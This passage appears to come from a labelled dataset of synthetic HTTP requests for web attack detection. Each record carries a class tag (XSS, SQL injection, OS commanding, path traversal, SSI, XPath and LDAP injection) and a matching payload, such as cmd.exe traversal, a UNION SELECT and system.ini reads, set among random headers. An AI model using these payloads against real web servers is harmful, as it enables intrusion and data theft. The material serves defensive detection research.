Authorization: Digest qop=auth-int
Range: 83215-
Referer: /w5vo8ue/t4citpI.asmx
TE: gzip,trailers
Trailer: Trailer
User-Agent: 1hpin4segsiaerh
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: lni/4.6 www.m4upn.gif, 5.8 www.iOREoH.jpg
Transfer-Encoding: deflate
Upgrade: egh/8.1, tns/7.8, oeTt/4.0, i6k/7.5, srt/5.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44482
Start - Id: 46506
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.ntscb.fr:28
Connection: iddda
Accept: audio/*;q=0.1, text/xml
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: humCdchv-he, oieUo-o
Cache-Control: no-cache
Client-ip: 227.172.153.65
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="761"
Date: Thu, 04 Feb 10 11:37:46 CET
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: TyeArn
From: piteR@trksge.gov
If-Modified-Since: Thu, 30 Apr 09 09:54:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: "a9y9kqdibKguyc6"
If-None-Match: *
If-Range: "4Arrm0d@fEkZnnw"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Digest qop=auth-int
Authorization: uflam edBtl=heEet
Range: 8817-695585,1-
Referer: /sbttr/hh1aH88s/ee5t.mspx
TE: chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/2.0 (compatible; 2eeH46; Linux i586; tenr8wse6s)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/6.1 236.209.231.19
Transfer-Encoding: gzip
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 270 www.Taaaeh.shtml "aOxgliirnstyeOIeo6rn" 
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46506
Start - Id: 44263
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: www.iSbrtnoii.org
Connection: Hmhjnris
Accept: */*;q=0.4
Accept-Charset: x-mac-icelandic;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: ve-hntsp
Cache-Control: t2Eneh=ksn8k
Client-ip: 225.50.172.247
Cookie: ri1un4nxemNoeiz=naaTXs;d2zmkzPF2X=7a;tnh5eErbbrof1=svgLcvm;onslht7attq=wqenvoTIorigosphu
Cookie2: $Version="544"
Date: Sun, 11 Jan 04 09:32:40 CET
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: 100-continue
From: Ce9h0dvt@naeheOu.st
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Tue, 28 Mar 06 09:06:31 GMT
If-Match: *
If-None-Match: *
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 9
MIME-Version: 4.2
Pragma: at7b='e'
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Ee5lv koctmu=lcpnt
Range: 1630-9,-816
Referer: http://gelegs.biz/ttEa/4C2eele/pIppepRg/l4cpeef4/iqoieoo.msf
TE: gzip
Trailer: Referer
User-Agent: eD.tZDxIy http://www.2a6saPy.fr
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7064x6561
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: identity
Upgrade: ytc/5.0, mosem/3.9
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44263
Start - Id: 42642
class: SqlInjection
GET /7h_.q-Z/aOyetszcyo4tusfton/rV@eQcwZMh5Y6/rVtE-u6HXbS4VnWfHR/o3rvgj1EZ/ae4q/le.cgi?groibtbuaEbdss=te%3Ftmppositionfetaebinane%5DgFupdate&S41connect=tne+toAnesopassthru&bacsnj=%27+++UNION+++++++++ALL+++++SELECT+evrdimG++++FROM+++slvD+++WHERE+%27%27+%3D%27 HTTP/1.1
Host: www.duee.com
Connection: ioet
Accept: audio/x-wav;q=0.5, image/gif;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: min-fresh=99196
Client-ip: 127.75.207.224
Cookie: svthnglmhimwl=7424630;pconitlyioynh=6505191;len= h3 (egge;bgsound-rms8mailS_iEO=tnznsEadgcfl;HuNr=ec ;wdbjfeA3fc=tn
Cookie2: $Version="792"
Date: Wed, 04 Oct 06 17:35:49 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Mon, 08 Oct 07 22:05:15 UTC
If-Unmodified-Since: Mon, 09 Aug 04 22:26:17 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "t3ZZn9T7aZU5gRt"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.2
Pragma: tao1dd4=ls1
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: y5ope qitm3=l1mmb
Range: 72326-9838
Referer: /GfmEhvsu/na2k/t7heL/iuae.html
TE: chunked
Trailer: If-Modified-Since
User-Agent: pIeo (eQWbrk1O; 7Iwi6Z; aLuX_g)
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: gzip
Upgrade: hoefdi/5.8, afmr09/0.6, fgj/9.1, mds/0.8, 8sseh/8.0
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42642
Start - Id: 39159
class: SSI
GET /yk3B-HxZY9l5b-w/ts5Tgobah/hnO4pmedteetiaf38s/e8uglUcs0e0/enxAsgoevnb/meolhoqowmsn.jpg?oeBesraur4eAtzo=782571&uascauqlitocaia=01676&tt8o=ple&eszighowfatal=le%2Ftxd&s0ateo58p6vtsbc=1242697&rpSi0rirBgo=i6&7body8Nm=%5Balink&ld8=%3E&lt6y=84967757&9ay2agera=%5Cnse HTTP/1.1
Host: www.dinyrnzn.ch
Connection: endoo1
Accept: image/*, audio/*;q=0.1, text/plain
Accept-Charset: euc-jp;q=0.3, x-mac-greek;q=0.5, euc-cn, cp-950
Accept-Encoding: 
Accept-Language: L-eoduoi, n-dNaena, Drsshv-Ujnamr, uhiMPb-etmipaw;q=0.4
Cache-Control: min-fresh=245
Client-ip: 108.165.242.234
Cookie: lI07fromhx=Be:autoexecau;DwBefNqm=8CbY1It8kfX;HtlnRmt4st=3cp_Lx;tenDu8oratofht=<!--#email fromhost="www.99etIu.com" tohost="mailbox.naevd.com" message="nTe7r ierloa eh0rbc PxEu5" fromaddress="wchn.com" toaddress="sci.ahoo.com" subject="ee" sender="4nea.com" replyto="amFnI.com" cc="Er3i" inreplyto="ne5g eDbm hs" id="eEdoemail" -->;._1Oy7fromK5update=tua;3rajee8r=927
Cookie2: $Version="260"
Date: Tue, 25 Oct 05 15:46:27 CET
ETag: "3Ai0g4hS2faZYj3s72aL"
Expect: 100-continue
If-Modified-Since: Sun, 04 Apr 04 17:57:00 UTC
If-Unmodified-Since: Sun, 13 Jan 08 19:27:01 CET
If-Match: *
If-None-Match: "em8pUXxXChJi8ibLR"
If-Range: Wed, 24 Dec 08 15:56:53 CET
Max-Forwards: 210
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ny22t
Authorization: Digest opaque="shE1lDt"
Range: -50,6-,-25
Referer: http://www.3hmtcf.st/ppiaf/eoll.nsf
TE: trailers,trailers,trailers
User-Agent: Mozilla/1.3 (Machintosh; U; PPC Mac OS X 6.6; t2-cr; rv:3.4.5) Gecko/39523559
UA-CPU: StrongARM
Via: HTTP/4.0 www.Xiwt.shtml
Transfer-Encoding: gzip
Upgrade: aoyby9/9.5
Warning: 117 www.ep1ght8.shtml:868 "eessiuajniSn" 

null

End - Id: 39159
Start - Id: 45855
class: PathTransversal
GET /hGQqG8ih_CBG/pMQTGU_4Z8ujXo/ahzuEHmuN3X086S/6tnattieneoth7o/tuixGw@rfE.I-xl_r/lv98/i6qkb/HOO1Ozzn/openRIb2ZghomeIha/tTh6_F@cB0U8/noix7iHetdax3ot.php3?ToohrlevI0S=oXSWiYC%40S8m&e8sTarleebsaeD=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ety=izEmtesm&9speew=aZhA7JBwjM&gmteto=aarnah+b4 HTTP/1.1
Host: www.omLeIEetS.net:65
Connection: COohxea
Accept: */*
Accept-Charset: x-mac-ce;q=0.5, ks_c_5601-1987;q=0.9, shift_jis;q=0.8
Accept-Encoding: *
Accept-Language: n-ur, wnE-ndahr;q=0.0
Cache-Control: no-store
Client-ip: 136.24.127.56
Cookie: uandk8n.WI=;c;orb3wrf8zn97trh=r-i-m9Zki;jttiannmTt=269;r4n=3oeq
Cookie2: $Version="19"
Date: Sat, 28 Mar 09 17:38:20 UTC
ETag: "Qy7TUM9@9Ytx9uIGT"
Expect: rh6tfy
From: emalit@e3Ooine.st
If-Modified-Since: Fri, 03 Apr 09 01:17:15 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: *
If-None-Match: *
If-Range: "HQHG3Sit@CtUCU1S5lhh"
Max-Forwards: 3
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/weir/iIesdqv/isbaatja.nsf
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://civcni.biz/pnqnottb/grr4wE4/yfptsm.php4
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/3.3 (X11; U; Linux i386 8.4; eh-dr; rv:8.8.3) Gecko/13288034
UA-CPU: Sparc
UA-Disp: 318,072,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: HTTP/0.5 www.netT.jpeg, FTP/3.8 www.ehsn7ge.js:54020
Transfer-Encoding: compress
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 787 245.252.99.223 "dmrosab" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45855
Start - Id: 44176
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.xtmHsnpv6.org
Connection: close
Accept: image/png, application/*;q=0.3
Accept-Charset: x-mac-hebrew, windows-1257
Accept-Encoding: gzip, deflate, deflate;q=0.0, deflate, compress;q=0.4
Accept-Language: r36t-lr, s-kHuxe;q=0.4
Cache-Control: max-stale=3178
Client-ip: 59.27.46.32
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Fri, 28 Aug 09 02:21:24 UTC
ETag: "@pQtfkHChnDufap0Uh"
Expect: 100-continue
From: ulnbn@Ssrnr.st
If-Modified-Since: Sat, 10 Sep 05 12:53:37 CET
If-Unmodified-Since: Mon, 07 Jan 08 22:52:19 UTC
If-Match: *
If-None-Match: "SzWwgNJNdiIahrV"
If-Range: Sun, 02 Aug 09 03:40:03 CET
Max-Forwards: 3
MIME-Version: 3.5
Pragma: t=n
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: Digest username="jhemspy"
Range: 5-,-97,-5
Referer: /rmneo/ohUa/LqouHhn/geoEse7.mdb
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/8.8 (X11; U; SunOS sun4u 2.1; Ea-0l; rv:6.6.1) Gecko/00363444
UA-CPU: Sparc
UA-Disp: 199,7941,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: compress
Upgrade: llemvt/2.2, yAhrud/8.0, Cskdn/9.3
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 103.223.39.110
X-Serial-Number: 338223
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44176
Start - Id: 35777
class: XPathInjection
GET /pdeG@ngOEV/ozopenGg1V_4/tBmJwsF/n8tao9kth4rid.php3?soam=copybgsoundR0&DdX-R=epoltQts%27+++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+++i%2B++++j++%2B++k%2Bl%2B+++1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++%27Gncoea%27++%3D++++%27+neze%27++++or&outyrFata4Nrn4n=oookVq05ied&TcsheOae=g++u&tip=%3C%24rt HTTP/1.0
Host: 207.108.241.23
Connection: Ncep
Accept: */*
Accept-Charset: x-mac-roman;q=0.7, windows-1255, macintosh
Accept-Encoding: deflate;q=0.9, identity;q=0.8
Accept-Language: *
Cache-Control: eowdwec=trsel3eo
Client-ip: 167.0.12.38
Cookie: ss2=3;dsnitrqtnyrv=gts;2l9aRldnetiguo=dci;teascee=eadRoAraidinput
Cookie2: $Version="11"
Date: Mon, 21 Mar 05 01:23:36 CET
ETag: "pvdGNDdpuHTzisFAi5g_"
Expect: 100-continue
From: Nginnon@eatp.net
If-Modified-Since: Fri, 03 Feb 06 04:09:46 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Dec 04 14:14:14 CET
Max-Forwards: 268
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest response="C38de08AB78A8Cbe7054fC4BdeEC281C"
Range: -777
Referer: http://www.gidoos.fr/rcdPta.msf
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.6 (X11; U; Linux i586 2.5; fn-so; rv:9.3.9) Gecko/15165058
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6100x360
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: identity
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35777
Start - Id: 35963
class: PathTransversal
GET /7tnxSoeirterswp/passwdqMcSdd1kUaB0F/aiLv6i6af4a5/wIgOtl/fdO.tiff?eAuEFt44=quescS1cUgt%7Ct&lssnidhitee=pll&jimocha3y6Zuwp-e=wDtdteRoxta&mOkrqhegehfmuot=itotdEin&openiC7Hw=teo15o&vvgroup byR=nuhn9swnsR&en9tEo=tbz HTTP/1.1
Host: www.bz3eaoi.it
Connection: lTJ6hjo
Accept: */*;q=0.0
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: rn-wbItls, oo-ene;q=0.1, L-pmUnht;q=0.8, hn-rhtafard;q=0.1
Cache-Control: no-cache
Cookie: Hea=hjJU@WKe7;4ampeogaahdihge=h+t;1fzIdWrIZlzs=hV6.;traodtoe=5486591
Cookie2: $Version="029"
Date: Sat, 19 Apr 08 19:48:13 UTC
ETag: W/"NKbJpRBfD618sorWh"
Expect: 100-continue
From: rTe3a@efe2tts.be
If-Modified-Since: Sat, 15 Mar 08 04:57:14 CET
If-Match: "iIG5oLfLyYoo1DN"
If-None-Match: *
Max-Forwards: 8
MIME-Version: 4.8
Pragma: n86ooadm='ltenNoe'
Authorization: Basic b3JYdWw6ZUVldHNhdA==
Referer: /arosxltr/lydwe/a4lsgis.bin
TE: deflate,deflate,trailers
User-Agent: ..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
UA-Pixels: 030x7263
Via: 5.4 www.oget4.js, 9.1 www.owbiaoei.shtml
Transfer-Encoding: gzip

null

End - Id: 35963
Start - Id: 41851
class: SqlInjection
GET /1osYtdKerl7S/jYbhj1GLxbOwQ3a.cfm?8tl=eB3m6B3t4FS&IhRngjatn=tilusoDeair&mailvarkwiFO=%27%3B+++++begin++declare++%40ret+++varchar%288000%29+++++set+%40ret%3D%27%3A%27++++select+++%40ret%3D%40ret%2B%27+%27%2Base9vhwe%2B%27%2F%27%2Bpassword++from+uR8f5H+++++where+sslrt%3E%40ret++select+++++%40ret+as+++++ret+++into+foo++end--&uasvecshT=0jTcmslq1u0hi9v&.QSuZ5u=ennq3Ko%7Cnmochaoeh+u&ttiweahedzUt9e=qRff+i HTTP/1.1
Host: www.eAwa3.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: i-cpnte;q=0.0, eazn-r4a79, sn93tpsy-dgero, noeAr-hlIa1on;q=0.5, tqHw8-t;q=0.7
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: hptiaveubdirt=oMsVnF;iwent2=~eab i)k&et0aaih;oaoCinAaoT=sgroup by2mt;iCaxr4nevale;ttnhsi=048
Cookie2: $Version="7"
Date: Sun, 12 Oct 08 22:29:06 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Fri, 10 Jun 05 17:32:58 UTC
If-Unmodified-Since: Mon, 01 Sep 08 01:35:42 CET
If-Match: "l-GQLSH_WHdBbLiKgFA"
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 9523
MIME-Version: 1.6
Pragma: wftSdxh=saeirif
Proxy-Authorization: Basic ajU1aXBLYTM6b2R5ZW5EbjU=
Authorization: trzlai 6oadtc=6ostB
Range: -521,-331719
Referer: /enjO/pEiscdcn/ydh2/nohc/ivhgpof.exe
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/2.6 (X11; U; Open BSD i386 9.9; io-ed; rv:8.1.3) Gecko/17101524
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: compress
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 219.12.246.47
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41851
Start - Id: 38464
class: LdapInjection
GET /8JO/ntihAw82hwyinne9i/tehnhr5nd40ol3maNxw0.shtml?1dmhghnudel=%29++++%28++%7C%28displayName%3Dhad*%29+%28name+%3D++had*%29%28++mail%3Dhad*+++%29&Sot=hD_ghoDg HTTP/1.1
Host: www.acnina00.net
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: fwlI4-sreiaST;q=0.5, edn5a-plid, ot-5t7Tytoh
Cache-Control: only-if-cached
Client-ip: 180.75.19.86
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="35"
Date: Fri, 29 Feb 08 07:41:06 UTC
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Fri, 16 Dec 05 09:23:41 UTC
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: "jOuYQtaOS4IwqAs"
If-None-Match: *
If-Range: Wed, 24 Dec 08 12:39:16 GMT
Max-Forwards: 5578
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM cjNucGFlQWR4bWVvdFl0YXJoZWxEdHRleUw4ZGVkYW9zcWllaWRlb2xlcmI=
Range: 24-,76759-,-19589
Referer: http://eelaiidt.gov/rsAnse/j4Dhle/lsot/w7Sahb7r/nidmnh.ace
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.5 (X11; U; Linux i586 7.5; iO-nl; rv:9.5.8) Gecko/94832042
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38464
Start - Id: 39815
class: SSI
GET /3fhlas/8e/LFm1/pNjOtuahX_B6/1G/sXjK@gc/1ZAlsN/hVBPVOZYg97_1/tSLkMd..gif?tg=netcat%29ao%5DmI&X0FsG4h=5gwgdfnoteacs%3D&m5erkbKe=943978&etiw3dpiewssnre=%3C%21--+++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&tssupea=ahwn&unE5u=070742&i4in=901&EsFbub=snyha HTTP/1.0
Host: 69.48.51.68:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1251;q=0.9, windows-874, euc-jp;q=0.6, windows-874
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=94760
Client-ip: 144.107.45.207
Cookie: e9ghhnsehem=tnoToqr9w3Fe;f9o8eqesdse5ias=738;ktETAOm%u=2321312;sm0miiky5cnanda=911
Cookie2: $Version="15"
Date: Thu, 04 Dec 08 22:49:28 UTC
ETag: W/"N3OJ9wRTHNv3uA18"
Expect: eE2cus9
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Mon, 18 Jun 07 15:24:32 CET
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 32
MIME-Version: 8.2
Pragma: Psish=e2susee
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: http://www.aaCsey8.gov/rmihgje/bzlc/p8hliL.bin
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: eahhhy8/2.2.3
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 4.2 www.4srt.shtml, HTTP/3.4 www.hsheo.html, 1.1 www.hNahzoh.jpg
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39815
Start - Id: 44879
class: PathTransversal
GET /qhw1NFWuJpTzD@b-/binNGLx2Iqg2WgR%u/pl/nu8nkE3ZisRRh9s5ir/6yhkrocNRs/uttoe2wfrzss/DR.php4?mnt5eg=collection%28+file%3A%2F%2F%2Fc%3A%2Fctt%2F8Ota.xml+++++%29 HTTP/1.0
Host: www.oe9aE.st
Connection: keep-alive
Accept: image/png, text/*;q=0.0
Accept-Charset: iso-8859-15, iso-8859-7, iso-8859-8-i;q=0.6
Accept-Encoding: gzip;q=0.3, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 32.25.74.7
Cookie: rus25se=ip
Cookie2: $Version="6"
Date: Tue, 07 Dec 04 19:50:17 CET
ETag: "naMiZq0dj4K0S8gHHUZ"
Expect: taeehs=nyno5;resd1u8b=eaehuibt
From: reecos@eeesftcx.gov
If-Modified-Since: Wed, 14 May 08 11:04:27 GMT
If-Unmodified-Since: Mon, 01 Aug 05 14:41:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Jul 09 20:21:11 UTC
Max-Forwards: 3
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: E6i4en cnemics=iaikur
Authorization: Basic ZWZ5YWk6cmdkbE9sb0w=
Range: -41,56231-,-8575
Referer: http://ariosovo.ch/afaytru/nlst/6lea9oi.cfm
TE: gzip,trailers,trailers
Trailer: TE
User-Agent: aykrpDonsj (a_ey2Ee; 5vDq@XPU; eWkYfZbMB-; hjr3TWsoq)
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 134x0521
Via: 4.9 www.rgah.html, 3.1 63.170.190.107:4, 4.8 www.G6selin.shtml
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44879
Start - Id: 35487
class: XPathInjection
GET /asagloe/lxiI./ulcnhziwoafhsz/n6v@m6bPmx22fL5/F0YcatxMlED46/AA0-HRaccess_loglink/f67FVYo5WAqTm/pighehe5tfhet4csu/onQ3BBBQUILAKNY.php3?artcxinswdoen=45485630&otnT=oab9lsme0&1f1twoonatIF9ss=100359&eyceUatteeuSpa=rmrcata%2Ftelnetdin&tu4oeoazhjmf=7123637912&sln61fnd=ntoWecs%5CnlexT&grschb=eDxCT%40r&lBe4positionkJvut=ze5v5np%3C2mwsh%40l&neLNOt6yheidr3H=7tw8ei%7CYoaab%40Qc&WLXinput9=l5%7E HTTP/1.1
Host: www.sec2bkats7.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1258;q=0.7, isiri-3342;q=0.4
Accept-Encoding: 
Accept-Language: thkaaS/nr/izj/child::node()[position()=26]  or 'ewxmi'  =    '
Cache-Control: min-fresh=581
Client-ip: 188.0.226.122
Cookie: Oisfaearc=758
Date: Thu, 05 Oct 06 08:10:45 UTC
Expect: 100-continue
From: aiSelq2@PfrEi.uk
If-Unmodified-Since: Sat, 12 Apr 08 21:18:33 CET
If-Match: "8kPd5-5.s7HXVEnVru"
If-Range: "6vW.fJygu_h3NTrne"
Max-Forwards: 55
Authorization: Digest algorithm=wzb6te
Referer: /2sooe/ei5nla/dehhehh.jsp
TE: chunked,trailers,trailers
User-Agent: fttdgnq/3.6
Via: 0.8 78.43.15.163:21
Transfer-Encoding: bRn7eo; gifha=ei0mg4
Upgrade: t2yvO/2.7, aoge/8.1, synlqt/8.7, juehds/7.8

null

End - Id: 35487
Start - Id: 48346
class: XPathInjection
GET /emhpaleYstohietG0/mei2imamoEx/e.iaNS/Bv./w0tnbea/XHm.tiff?J0QsPXSNS=eh46&hoeA=ia+m&wact=aakQHfkUMlOs&dpet3uakz=dbA&oe=lc&Ntane4bpcsw=Jp&v2p=twyt9%24&.BOZzpPJmeta_KY=5fhaeyetcleV0rqD6&tenu1=see&l6jrymEa1=bwweiwubismy&tU7LcattlAHr=7JsaqEKW&xsehrygje=42045&ldnrtlyeafctt=Owutoldfncansoie&p4ZmP=798327&bemkz=6 HTTP/1.1
Host: www.hmndeztAkt.cz:90
Connection: close
Accept: application/x-tar, image/jpeg, audio/*
Accept-Charset: x-mac-ce;q=0.3, iso-8859-7;q=0.8, x-mac-icelandic
Accept-Encoding: mdgrsyv'     or   sgS/nei/child::node()[processing-instruction()=82]    or    'EDa'    = '
Accept-Language: ta4o-eeu, dfd-ec, iCrhCMi-tsvt, iaNla-Zxqw3coe
Cache-Control: only-if-cached
Client-ip: 201.243.131.154
Cookie: nlir9oy1dqXldym=971966192;Ywef=olPnibshAPaw;jbiu=s9de9e/A;kOni4cuaAsndctd=gtEontorflh7xterm;rhsyhatzqne=oHehnaeseinsmdy;qTmTmXlFe-=aE6if
Cookie2: $Version="2"
Date: Thu, 10 Dec 09 06:30:03 GMT
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: sCbae=NsEera;lsae0ast
From: o65E@sltnqAcMg.uk
If-Modified-Since: Thu, 01 Nov 07 05:34:28 UTC
If-Unmodified-Since: Fri, 09 Jan 09 03:28:06 CET
If-Match: *
If-None-Match: "4nM5VCjVU_VeL3FvHCj"
If-Range: "hPt.QYl8w3FPf.fjjx"
Max-Forwards: 6211
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest realm
